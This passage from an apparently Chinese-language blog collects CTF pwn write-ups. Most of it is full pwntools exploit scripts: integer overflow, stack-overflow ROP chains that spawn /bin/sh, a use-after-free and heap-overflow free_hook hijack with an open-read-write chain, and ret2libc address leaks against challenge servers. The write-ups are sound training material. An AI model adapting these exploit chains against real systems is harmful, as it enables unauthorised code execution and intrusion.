class=\"wp-block-heading\">easypwn2<\/h2>\n\n\n\n<p>\u6574\u6570\u5b89\u5168\u95ee\u9898<\/p>\n\n\n\n<p>\u5c31\u662f\u8981\u6c42\u4f20\u5165\u8d1f\u6570\u4f46\u662f\u4e0d\u80fd\u6709\u8d1f\u53f7<\/p>\n\n\n\n<p>\u5e38\u89c4：2147483648 = 0x80000000，正好比 32 位有符号整数的上限大 1，转成 int 后被截断为 INT_MIN（-2147483648），于是输入里没有负号也能得到一个负数。截断具体发生在 atoi\/strtol 还是 scanf 取决于题目实现，不确定就在 gdb 里看一眼转换后的值。<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>io = process(\".\/pwn\")<br>#io = remote(\"1.95.36.136\",2108)<br>\u200b<br>pd = b'2147483648'<br># gdb.attach(io)<br>io.sendline(pd)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">what&#8217;s your name<\/h2>\n\n\n\n<p>\u8986\u76d6<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>io = remote(\"1.95.36.136\",2105)<br># io = process(\".\/pwn\")<br>\u200b<br>pd = b'aaaatznb'<br>io.send(pd)<br>io.interactive()<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">getshell<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">0xgame2025<\/h2>\n\n\n\n<p>\u597d\u591a\uff0c\u4e4b\u540e\u518d\u6765\u7ec6\u5206<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># from pwn import *\n# io = remote(\"nc1.ctfplus.cn\",42686)\n# ret = 0x000000000040101a\n# backdoor = 0x4011F7\n# payload = b'a'*(48+8) + p64(ret) + p64(backdoor)\n# io.sendline(payload)\n# io.interactive()\n\n# from pwn import *\n#\n# context.log_level = 'debug'\n# io = remote(\"nc1.ctfplus.cn\", 
33062)\n#\n# try:\n#     # \u5904\u7406\u521d\u59cb\u63d0\u793a\u4fe1\u606f\n#     io.recvuntil(b\"Kore wa shiren da!\\n\")\n#\n#     while True:\n#         # \u5c1d\u8bd5\u63a5\u6536\u9898\u76ee\u884c\n#         try:\n#             question = io.recvuntil(b\"=\", drop=True, timeout=1).decode().strip()\n#         except:\n#             # \u65e0\u6cd5\u63a5\u6536\u65b0\u9898\u76ee\u65f6\uff0c\u8fdb\u5165\u4ea4\u4e92\u6a21\u5f0f\n#             print(\"No more questions, entering interactive mode...\")\n#             break\n#\n#         # \u5c06\u4e58\u6cd5\u7b26\u53f7x\u66ff\u6362\u4e3a*\n#         question = question.replace(\"x\", \"*\")\n#         # \u8ba1\u7b97\u7ed3\u679c（注意：eval 会直接执行服务端发来的字符串，只能用在这种可信的题目环境里；通用脚本应该自己解析数字和运算符，不要对网络输入直接 eval）\n#         ans = int(eval(question))\n#         # \u53d1\u9001\u7b54\u6848\uff0c\u4f7f\u7528bytes\u7c7b\u578b\u907f\u514d\u8b66\u544a\n#         io.sendlineafter(b\"?\\n\", str(ans).encode())\n#         # \u63a5\u6536\"Good work!\"\u7684\u53cd\u9988\n#         io.recvuntil(b\"Good work!\\n\")\n#\n# except Exception as e:\n#     print(f\"Error occurred: {e}\")\n#\n# # \u65e0\u8bba\u6b63\u5e38\u7ed3\u675f\u8fd8\u662f\u5f02\u5e38\uff0c\u90fd\u8fdb\u5165\u4ea4\u4e92\u6a21\u5f0f\n# io.interactive()\n\n# from pwn import *\n# context.log_level = 'debug'\n# io = remote('nc1.ctfplus.cn', 27397)\n#\n# # 1. \u786e\u8ba4\u6240\u6709\u5173\u952e\u5730\u5740\uff08\u4ece\u4f60\u7684ROPgadget\u548c\u53cd\u7f16\u8bd1\u7ed3\u679c\u9a8c\u8bc1\uff0c\u5747\u6b63\u786e\uff09\n# sh = 0x000000000040201e          # \"\/bin\/sh\"\u5b57\u7b26\u4e32\u5730\u5740\uff08\u5fc5\u987b\u5b58\u5728\uff0c\u53ef\u901a\u8fc7objdump -s\u786e\u8ba4\uff09\n# call_system = 0x0000000000401195  # help\u51fd\u6570\u4e2d\"call _system\"\u7684\u5730\u5740\uff08\u76f4\u63a5\u590d\u7528\u73b0\u6210\u7684system\u8c03\u7528\uff09\n# pop_rdi = 0x000000000040117e      # \u6b63\u786e\u7684\"pop rdi; ret\" gadget\uff08ROPgadget\u660e\u786e\u663e\u793a\u5b58\u5728\uff09\n#\n# # 2. 
\u6784\u9020ROP\u94fe\uff08\u504f\u79fb\u6b63\u786e\uff1a32\u5b57\u8282buf + 8\u5b57\u8282rbp = 40\u5b57\u8282\u586b\u5145\uff09\n# payload = (\n#     b'a' * 40                  # \u586b\u5145\u7f13\u51b2\u533a\u5230rbp\uff0c\u518d\u8986\u76d6rbp\n#     + p64(pop_rdi)             # \u6267\u884c\u540e\uff0c\u6808\u9876\u7684\u503c\u4f1a\u653e\u5165rdi\uff08x86_64\u7b2c\u4e00\u4e2a\u53c2\u6570\u5bc4\u5b58\u5668\uff09\n#     + p64(sh)                  # \u628a\"\/bin\/sh\"\u5730\u5740\u538b\u6808\uff0c\u4f9bpop_rdi\u53d6\u51fa\u653e\u5165rdi\n#     + p64(call_system)         # \u8c03\u7528system\uff0c\u6b64\u65f6rdi\u5df2\u6307\u5411\"\/bin\/sh\"\uff0c\u76f4\u63a5\u83b7\u53d6shell\n# )\n#\n# # 3. \u6309\u5b9e\u9645\u8f93\u51fa\u987a\u5e8f\u63a5\u6536\uff08\u5173\u952e\uff01\u5148\u6536help\u7684\u8f93\u51fa\uff0c\u518d\u6536main\u7684puts\u8f93\u51fa\uff09\n# io.recvuntil(b\"Maybe you need this: sh\\n\")  # \u7b2c\u4e00\u6b65\u5b9e\u9645\u6536\u5230\u7684\u662fhelp\u7684echo\u8f93\u51fa\n# io.sendline(payload)\n#\n#\n#\n#\n# # 5. 
\u8fdb\u5165\u4ea4\u4e92\u6a21\u5f0f\u83b7\u53d6shell\n# io.interactive()\n\nfrom pwn import *\n\n# \u8fde\u63a5\u8fdc\u7a0b\u76ee\u6807\uff08\u672c\u5730\u6d4b\u8bd5\u65f6\u66ff\u6362\u4e3a\uff1ap = process(\".\/pwn2\")\uff09\np = remote(\"nc1.ctfplus.cn\", 28889)\n\n# \u5173\u952e\u56fa\u5b9a\u5730\u5740\uff08\u5df2\u901a\u8fc7\u8c03\u8bd5\u786e\u8ba4\uff0c\u65e0\u9700\u4fee\u6539\uff09\npadding = b'A' * 56  # 48\u5b57\u8282buf + 8\u5b57\u8282rbp\uff0c\u8986\u76d6\u81f3\u8fd4\u56de\u5730\u5740\npop_rdi = p64(0x000000000040119e)  # pop rdi; ret\uff08\u4f20\u9012system\u53c2\u6570\u7684\u6838\u5fc3gadget\uff09\nsystem_addr = p64(0x000000000040122B)  # main\u4e2dcall system@plt\u7684\u5730\u5740\ncmd_addr = p64(0x0000000000401202)  # \u56fa\u5b9a\u5b58\u50a8\"$0\"\u7684\u5730\u5740\uff08\u7b49\u4ef7\u4e8e\/bin\/sh\uff09\n\n# \u6784\u9020ROP\u94fe\uff1a\u8986\u76d6\u8fd4\u56de\u5730\u5740 \u2192 \u4f20\u53c2 \u2192 \u8c03\u7528system\npayload = padding + pop_rdi + cmd_addr + system_addr\n\n# \u53d1\u9001payload\uff08\u7b49\u5f85\u7a0b\u5e8f\u8f93\u51fa\"Start your attack\"\u540e\u53d1\u9001\uff09\np.sendlineafter(\"Start your attack\", payload)\n\n# \u4ea4\u4e92\u83b7\u53d6shell\uff08\u6267\u884cls\u3001cat flag\u7b49\u547d\u4ee4\uff09\np.interactive()<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">lilpwn\uff08\u6211\u600e\u4e48\u81ea\u5df1\u90fd\u6ca1\u8bb0\u5fc6\u4e86\u2026\u2026<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">Heap Pivoting<\/h2>\n\n\n\n<p>\u8fd9\u4e2a\u5806\u9898\u76ee\u7684\u6838\u5fc3\u662f\u5229\u7528\u5806\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8bfb\u5199\uff0c\u6700\u7ec8\u901a\u8fc7ROP\u94fe\u8bfb\u53d6flag\u3002\u9898\u76ee\u662f\u9759\u6001\u7f16\u8bd1\u768464\u4f4d\u7a0b\u5e8f\uff0c\u5f00\u542f\u4e86NX\u4f46\u672a\u5f00\u542fPIE\uff0c\u8ba9\u6211\u4eec\u80fd\u591f\u5229\u7528\u56fa\u5b9a\u5730\u5740\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n\n\n\n<p>\u7a0b\u5e8f\u5b58\u5728\u4e24\u4e2a\u5173\u952e\u6f0f\u6d1e\uff1a<\/p>\n\n\n\n<ol 
class=\"wp-block-list\">\n<li><strong>UAF\u6f0f\u6d1e<\/strong>\uff1a\u91ca\u653e\u5806\u5757\u540e\u6307\u9488\u672a\u6e05\u96f6\uff0c\u53ef\u7ee7\u7eed\u7f16\u8f91<\/li>\n\n\n\n<li><strong>\u5806\u6ea2\u51fa<\/strong>\uff1a\u7f16\u8f91\u529f\u80fd\u672a\u68c0\u67e5\u957f\u5ea6\uff0c\u53ef\u8986\u76d6\u76f8\u90bb\u5806\u5757\u5143\u6570\u636e<\/li>\n<\/ol>\n\n\n\n<p>\u9996\u5148\u521b\u5efa\u4e24\u4e2a\u5806\u5757\uff0c\u5176\u4e2dchunk1\u5b58\u653e&#8221;flag&#8221;\u5b57\u7b26\u4e32\u5907\u7528\u3002\u91ca\u653echunk0\u5236\u9020\u60ac\u7a7a\u6307\u9488\uff0c\u7136\u540e\u7f16\u8f91\u5b83\u4fee\u6539fd\u6307\u9488\u6307\u5411\u5806\u5757\u5217\u8868(chunk_list)\u4e0a\u65b90x10\u5b57\u8282\u5904\u3002\u8fd9\u6837\u518d\u6b21\u5206\u914dchunk2\u65f6\uff0c\u5c31\u80fd\u63a7\u5236\u5806\u5757\u5217\u8868\u672c\u8eab\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>add(0)<br>add(1, \"flag\") &nbsp;# \u5b58\u50a8\"flag\"\u5b57\u7b26\u4e32<br>free(0) &nbsp;# \u5236\u9020UAF<br>\u200b<br># \u4fee\u6539fd\u6307\u5411\u5806\u5757\u5217\u8868<br>chunk_list = 0x6CCD60<br>edit(0, p64(0) + p64(chunk_list - 0x10))<br>add(2) &nbsp;# \u6b64\u65f6chunk2\u63a7\u5236\u5806\u5757\u5217\u8868<\/code><\/pre>\n\n\n\n<p>\u901a\u8fc7\u4fee\u6539\u5806\u5757\u5217\u8868\uff0c\u5c06free_hook\u7684\u5730\u5740\u653e\u5165\u5806\u5757\u5217\u8868\u4e2d\u3002\u8fde\u7eed\u5206\u914d\u591a\u4e2achunk2\uff0c\u5728\u6bcf\u6b21\u5206\u914d\u65f6\u5728\u5806\u5757\u5185\u5bb9\u4e2d\u6784\u9020fake chunk\uff0c\u4f7f\u5176fd\u6307\u5411free_hook\u5730\u5740\u3002\u8fd9\u6837\u5c31\u80fd\u901a\u8fc7\u7f16\u8f91chunk0\u6765\u4fee\u6539free_hook\u7684\u503c\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"># \u8bbe\u7f6e\u5806\u5757\u5217\u8868\u6307\u5411\u5173\u952e\u5168\u5c40\u53d8\u91cf<br>edit(0, p64(0x6cc968) + p64(0) + p64(0x6ca858) * 2)<br>\u200b<br># \u591a\u6b21\u5206\u914d\u6784\u9020fake chunk\u6307\u5411free_hook<br>free_hook = 0x6CC5E8<br>for i in range(4):<br> &nbsp; 
&nbsp;add(2, b'a' * 0xb8 + p64(free_hook) + p64(0x6cc640))<\/pre>\n\n\n\n<p>\u5c06free_hook\u8986\u76d6\u4e3a_dl_debug_printf\u51fd\u6570\u5730\u5740\u3002\u8fd9\u4e2a\u51fd\u6570\u53ef\u4ee5\u63a7\u5236rdi\u6253\u5370\u4efb\u610f\u5730\u5740\u5185\u5bb9\u3002\u91ca\u653echunk1\u89e6\u53d1\u8be5\u51fd\u6570\u8c03\u7528\uff0c\u6cc4\u9732\u6808\u5730\u5740\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># \u8986\u76d6free_hook\u4e3a_dl_debug_printf<br>_dl_debug_printf = 0x474310<br>edit(0, p64(_dl_debug_printf))<br>free(1) &nbsp;# \u89e6\u53d1\u51fd\u6570\u8c03\u7528\uff0c\u6cc4\u9732\u6808\u5730\u5740<br>\u200b<br># \u8ba1\u7b97\u8fd4\u56de\u5730\u5740\u4f4d\u7f6e<br>stack = u64(ru(b'\\x7f')&#91;-6:].ljust(8, b'\\x00'))<br>return_addr = stack - 0x180<\/code><\/pre>\n\n\n\n<p>\u901a\u8fc7\u5806\u6ea2\u51fa\u5c06\u4e3b\u51fd\u6570\u8fd4\u56de\u5730\u5740\u8986\u76d6\u4e3aROP\u94fe\u5730\u5740\u3002\u6784\u9020\u7684ROP\u94fe\u4f9d\u6b21\u6267\u884c\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u6253\u5f00&#8221;flag&#8221;\u6587\u4ef6\uff08\u7cfb\u7edf\u8c03\u7528\u53f72\uff09<\/li>\n\n\n\n<li>\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9\u5230\u6808\u7f13\u51b2\u533a<\/li>\n\n\n\n<li>\u5c06\u5185\u5bb9\u8f93\u51fa\u5230\u6807\u51c6\u8f93\u51fa<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code># \u8986\u76d6\u8fd4\u56de\u5730\u5740<br>edit(2, b'a' * 0xb8 + p64(return_addr))<br>\u200b<br># \u6784\u9020ORW ROP\u94fe<br>pop_rdi = 0x0000000000401a16<br>pop_rsi = 0x0000000000401b37<br>pop_rdx = 0x0000000000443136<br>pop_rax = 0x000000000041fc84<br>syscall_ret = 0x4678E5<br>\u200b<br>pd = p64(pop_rdi) + p64(return_addr + 0xc8) &nbsp;# \"flag\"\u5b57\u7b26\u4e32\u5730\u5740<br>pd += p64(pop_rsi) + p64(0) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # \u53ea\u8bfb\u6a21\u5f0f<br>pd += p64(pop_rax) + p64(2) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # SYS_open<br>pd += p64(syscall_ret)<br>\u200b<br># \u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9<br>pd 
+= p64(pop_rdi) + p64(3) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # \u6587\u4ef6\u63cf\u8ff0\u7b26<br>pd += p64(pop_rsi) + p64(return_addr + 0x500) # \u7f13\u51b2\u533a<br>pd += p64(pop_rdx) + p64(0x30) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u957f\u5ea6<br>pd += p64(pop_rax) + p64(0) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # SYS_read<br>pd += p64(syscall_ret)<br>\u200b<br># \u8f93\u51fa\u5230\u6807\u51c6\u8f93\u51fa<br>pd += p64(pop_rdi) + p64(1) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # stdout<br>pd += p64(pop_rsi) + p64(return_addr + 0x500)<br>pd += p64(pop_rdx) + p64(0x30)<br>pd += p64(pop_rax) + p64(1) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # SYS_write<br>pd += p64(syscall_ret)<br>pd += b'flag\\x00\\x00\\x00\\x00' &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # \"flag\"\u5b57\u7b26\u4e32<br>\u200b<br>edit(0, pd) &nbsp;# \u5199\u5165ROP\u94fe<\/code><\/pre>\n\n\n\n<p>\u6700\u7ec8exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context(log_level='debug')<br>elf = ELF('.\/pwn')<br>context.binary = elf<br>libc = elf.libc<br>\u200b<br>DEBUG_ARGV = \"\"\"<br>b *0x400C66<br>b *0x41E985<br>b *0x400C66<br>set glibc 2.23<br>\"\"\"<br>\u200b<br>\u200b<br>\u200b<br>\u200b<br>def lg(s):<br> &nbsp; &nbsp;return info(f'\\033&#91;1;33m{f\"{s}--&gt;0x{eval(s):02x}\"}\\033&#91;0m')<br>\u200b<br>\u200b<br>r = lambda a: io.recv(a)<br>ru = lambda a: io.recvuntil(a)<br>s = lambda a: io.send(a)<br>sa = lambda a, b: io.sendafter(a, b)<br>sl = lambda a: io.sendline(a)<br>sla = lambda a, b: io.sendlineafter(a, b)<br>\u200b<br>io = remote(\"challenge.xinshi.fun\",48639 )<br>\u200b<br>\u200b<br>def choice(idx):<br> &nbsp; &nbsp;sla(b'choice:', str(idx))<br>\u200b<br>\u200b<br>def add(idx, content=b'aaaa'):<br> &nbsp; &nbsp;choice(1)<br> &nbsp; &nbsp;sla(b'idx:', str(idx))<br> &nbsp; &nbsp;sa(b\"say\", content)<br>\u200b<br>\u200b<br>def free(idx):<br> &nbsp; &nbsp;choice(2)<br> 
&nbsp; &nbsp;sla(b'idx:', str(idx))<br>\u200b<br>\u200b<br>def edit(idx, content):<br> &nbsp; &nbsp;choice(3)<br> &nbsp; &nbsp;sla(b'idx:', str(idx))<br> &nbsp; &nbsp;sa(b'context: ', content)<br>\u200b<br>\u200b<br>def exit_():<br> &nbsp; &nbsp;choice(4)<br>\u200b<br>\u200b<br>add(0)<br>add(1, \"flag\")<br>\u200b<br>free(0)<br>\u200b<br>chunk_list = 0x6CCD60<br>edit(0, p64(0) + p64(chunk_list - 0x10))<br>add(2)<br>\u200b<br>free_hook = 0x6CC5E8<br>edit(0, p64(0x6cc968) + p64(0) + p64(0x6ca858) * 2)<br>\u200b<br>rdi = 0x6ccd68<br>for i in range(4):<br> &nbsp; &nbsp;add(2, b'a' * 0xb8 + p64(free_hook) + p64(0x6cc640))<br>\u200b<br>fopen64 = 0x46AC50<br>fputs = 0x463340<br>fxprintf = 0x40FE20<br>vfxprintf = 0x45F940<br>_dl_debug_printf = 0x474310<br>mmap = 0x440710<br>edit(0, p64(_dl_debug_printf))<br>\u200b<br>free(1)<br>\u200b<br>stack = u64(ru(b'\\x7f')&#91;-6:].ljust(8, b'\\x00'))<br>lg(\"stack\")<br>return_addr = stack - 0x180<br>lg(\"return_addr\")<br>\u200b<br>edit(2, b'a' * 0xb8 + p64(return_addr))<br>\u200b<br>pop_rdi = 0x0000000000401a16<br>pop_rsi = 0x0000000000401b37<br>pop_rdx = 0x0000000000443136<br>pop_rax = 0x000000000041fc84<br>pop_rbp = 0x00000000004004d1<br>ret = 0x00000000004002e1<br>syscall_ret = 0x4678E5<br>\u200b<br>pd = p64(pop_rdi) + p64(return_addr + 0xc8)<br>pd += p64(pop_rsi) + p64(0)<br>pd += p64(pop_rax) + p64(2)<br>pd += p64(syscall_ret)<br>\u200b<br>pd += p64(pop_rdi) + p64(3)<br>pd += p64(pop_rsi) + p64(return_addr + 0x500)<br>pd += p64(pop_rdx) + p64(0x30)<br>pd += p64(pop_rax) + p64(0)<br>pd += p64(syscall_ret)<br>\u200b<br>pd += p64(pop_rdi) + p64(1)<br>pd += p64(pop_rsi) + p64(return_addr + 0x500)<br>pd += p64(pop_rdx) + p64(0x30)<br>pd += p64(pop_rax) + p64(1)<br>pd += p64(syscall_ret)<br>pd += b'flag\\x00\\x00\\x00\\x00'<br>\u200b<br>edit(0, pd)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b7e\u5230<\/h2>\n\n\n\n<p>64\u4f4dret2libc\u677f\u5b50\u9898<\/p>\n\n\n\n<p>ROPgadget\u627epop rdi 
\uff0cret<\/p>\n\n\n\n<p>\u7136\u540e\u504f\u79fb0x70<\/p>\n\n\n\n<p>\u9898\u76ee\u5df2\u7ecf\u7ed9\u4e86libc\u6587\u4ef6<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>\u200b<br>io = remote('challenge.xinshi.fun',49363)<br># io=process(\".\/pwn\")<br>elf = ELF('.\/pwn')<br>libc= ELF('.\/libc.so.6')<br>\u200b<br>ret_add = 0x000000000040101a<br>pop_rdi = 0x0000000000401176<br>main_add = 0x401178<br>puts_got = elf.got&#91;'puts']<br>puts_plt = elf.plt&#91;'puts']<br>\u200b<br>print(\"Puts_got: \",hex(puts_got))<br>print(\"Puts_plt: \",hex(puts_plt))<br>\u200b<br>offset= 0x70<br>\u200b<br>payload1 = b'a' * (offset+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_add)<br>io.sendlineafter(b'name?', payload1)<br>puts_addr = u64(io.recvuntil(b'\\x7f')&#91;-6:].ljust(8,b'\\x00'))<br>print(\"Puts_addr: \",hex(puts_addr))<br>\u200b<br>\u200b<br>\u200b<br>libc_base = puts_addr - libc.symbols&#91;'puts']<br>system_add = libc_base + libc.symbols&#91;'system']<br>bin_sh_add = libc_base + next(libc.search(b'\/bin\/sh'))<br>\u200b<br>payload2 = b'a' * (offset+8) + p64(ret_add) + p64(pop_rdi) + p64(bin_sh_add) + p64(system_add)<br>\u200b<br>io.sendlineafter(b'name?', payload2)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Ret2libc&#8217;s Revenge<\/h2>\n\n\n\n<p>64\u4f4d<\/p>\n\n\n\n<p>ROPgadget\u627e\u4e0d\u5230pop rdi<\/p>\n\n\n\n<p>\u53ea\u80fd\u53e6\u627e\u4ee3\u66ff<\/p>\n\n\n\n<p>stdout\u8bbe\u7f6e\u4e3a\u65e0\u7f13\u51b2\uff0c\u6ca1\u529e\u6cd5\u76f4\u63a5\u6cc4\u9732\u5730\u5740\uff0c\u53ea\u80fd\u901a\u8fc7\u6ea2\u51fa\u591a\u6b21\u5faa\u73af\uff0c\u628a\u7f13\u51b2\u533a\u586b\u6ee1\uff0c\u518d\u586b\u4e00\u4e2alea rdi\uff0cs\u7684\u5730\u5740\uff0c\u7136\u540e\u5c31\u662fret2libc<\/p>\n\n\n\n<p>\u5faa\u73af\u6b21\u6570\u901a\u8fc7\u624b\u6413<\/p>\n\n\n\n<p>puts(&#8220;Ret2libc&#8217;s 
Revenge&#8221;);\u4f1a\u5199\u8fdb18\u4e2a\u5b57\u7b26\u52a0\u4e00\u4e2a\u6362\u884c\u7b26\uff0c\u5c31\u662f19\u4e2a<\/p>\n\n\n\n<p>\u7a0b\u5e8f\u672c\u8eab\u4f1a\u6267\u884c\u4e00\u6b21puts<\/p>\n\n\n\n<p>\uff08214+1\uff09*19 = 4085<\/p>\n\n\n\n<p>\u800c\u7f13\u51b2\u533a\u4e3a0x1000 = 4096<\/p>\n\n\n\n<p>\u6240\u4ee5\u5faa\u73af\u6b21\u6570\u662f214<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>elf = ELF('.\/src\/attachment')<br>context.binary = elf<br>libc = ELF(\".\/src\/libc6_2.35-0ubuntu3.9_amd64.so\")<br>\u200b<br>io=remote(\"39.106.48.123\",35843)<br>\u200b<br>and_rsi_0 = 0x4010E4<br>pop_rbp = 0x000000000040117d<br>gadget = 0x4010EB # add rsi, &#91;rbp+20h];ret<br>mov_rdi_rsi = 0x401180<br>\u200b<br>payload = b'a'*(0x220-4)+p32(0x220+8-3)<br>payload += p64(0x40128D)<br>\u200b<br>\u200b<br>for i in range(214):<br> &nbsp; &nbsp;io.sendline(payload)<br>\u200b<br>payload = b'a'*(0x220-4)+p32(0x220+8 - 3)<br>\u200b<br>payload += p64(and_rsi_0)<br>payload += p64(pop_rbp) + p64(0x400600-0x20)<br>payload += p64(gadget)<br>payload += p64(mov_rdi_rsi)<br>payload += p64(elf.plt&#91;'puts'])<br>payload += p64(0x40128D)<br>io.sendline(payload)<br>\u200b<br>libc_base = u64(io.recvuntil(b'\\x7f')&#91;-6:].ljust(8,b'\\x00'))-libc.symbols&#91;b\"puts\"]<br>\u200b<br>\u200b<br>libc_system = libc_base + libc.symbols&#91;b'system']<br>ret = 0x4011FE<br>bin_sh = libc_base + next(libc.search(b\"\/bin\/sh\"))<br>pop_rdi = libc_base +next(libc.search(asm(\"pop rdi; ret\")))<br>\u200b<br>payload = b'a'*(0x220-4)+p32(0x220+8 - 3)<br>payload += p64(ret)<br>payload += p64(pop_rdi)<br>payload += p64(bin_sh)<br>payload += p64(libc_system)<br>io.sendlineafter(\"Ret\",payload)<br>\u200b<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">2025COCTF\u65b0\u751f\u8d5bWP<\/h2>\n\n\n\n<pre class=\"wp-block-preformatted\">typora-root-url: images\n<\/pre>\n\n\n\n<h1 
class=\"wp-block-heading\">feichai\u7cfb\u5217\u9898\u76ee\uff1a<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">Pwn\u5165\u95e8\u6307\u5317<\/h3>\n\n\n\n<p>emmmm,\u76f4\u63a5\u770b\u6307\u5317\u5c31\u597d\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import * &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u5bfc\u5165 pwntools\u3002<br>context(arch='amd64', os='linux', log_level='debug') # \u4e00\u4e9b\u57fa\u672c\u7684\u914d\u7f6e\u3002<br>\u200b<br># elf = ELF('..\/ctf_file\/test') &nbsp; &nbsp; # \u52a0\u8f7d elf \u6587\u4ef6\u3002<br># io = process(elf.path) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  # \u8fd0\u884c elf \u6587\u4ef6\u3002<br>io = remote(\"\",) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u4e0e\u5728\u7ebf\u73af\u5883\u4ea4\u4e92\u3002<br>\u200b<br>io.recvuntil(\"&gt; \") &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u5faa\u73af\u7b49\u5f85\uff0c\u76f4\u5230\u63a5\u6536\u5230\u63d0\u793a\u7b26\u3002<br>io.sendline(\"No pwn\/re, no life!\") &nbsp;# \u53d1\u9001\u5b57\u7b26\u4e32\u3002<br>\u200b<br>io.interactive() &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u8fdb\u5165\u4ea4\u4e92\u6a21\u5f0f\u3002<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u7ec8\u6781\u9ed1\u5ba2<\/h3>\n\n\n\n<p>\u8003\u70b9\u53ea\u6709\u4e00\u4e2a\u547d\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ls -a<\/code><\/pre>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230flag\u524d\u52a0\u4e86\u4e00\u4e2a\u70b9\uff0c\u76f4\u63a5ls\u662f\u770b\u4e0d\u5230\u7684<\/p>\n\n\n\n<p>\u6240\u4ee5<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat .flag<\/code><\/pre>\n\n\n\n<p>\u5c31\u53ef\u4ee5\u4e86<\/p>\n\n\n\n<h3 
class=\"wp-block-heading\">\u77f3\u5934\u270a\u526a\u5200\u270c\ufe0f\u5e03\u270b<\/h3>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u7a0b\u5e8f\u52a0\u4e86\u4e00\u4e2a\u968f\u673a\u6570\u79cd\u5b50\uff0c\u4f46\u8fd9\u5e76\u4e0d\u662f\u771f\u6b63\u7684\u968f\u673a\uff0ctime(0)\u8868\u793a\u5f53\u524d\u65f6\u95f4\uff0c\u8fd4\u56de\u65f6\u95f4\u6233\uff0csrand\u5c06\u5176\u4f5c\u4e3a\u79cd\u5b50\uff0c\u4ee5\u6b64\u4f7f\u7528rand()\u51fd\u6570\u6765\u751f\u6210\u968f\u673a\u6570<\/p>\n\n\n\n<p>\u6240\u4ee5\uff0c\u6211\u4eec\u5b8c\u5168\u53ef\u4ee5\u4f7f\u7528python\u7684ctypes\u5e93\u6765\u6a21\u62df\u8fd9\u4e00\u884c\u4e3a\uff0c\u4f7f\u5f97\u6211\u4eec\u80fd\u63a8\u6d4b\u6240\u6709\u7684\u968f\u673a\u6570<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-48-1024x679.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"679\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-48-1024x679.png\" 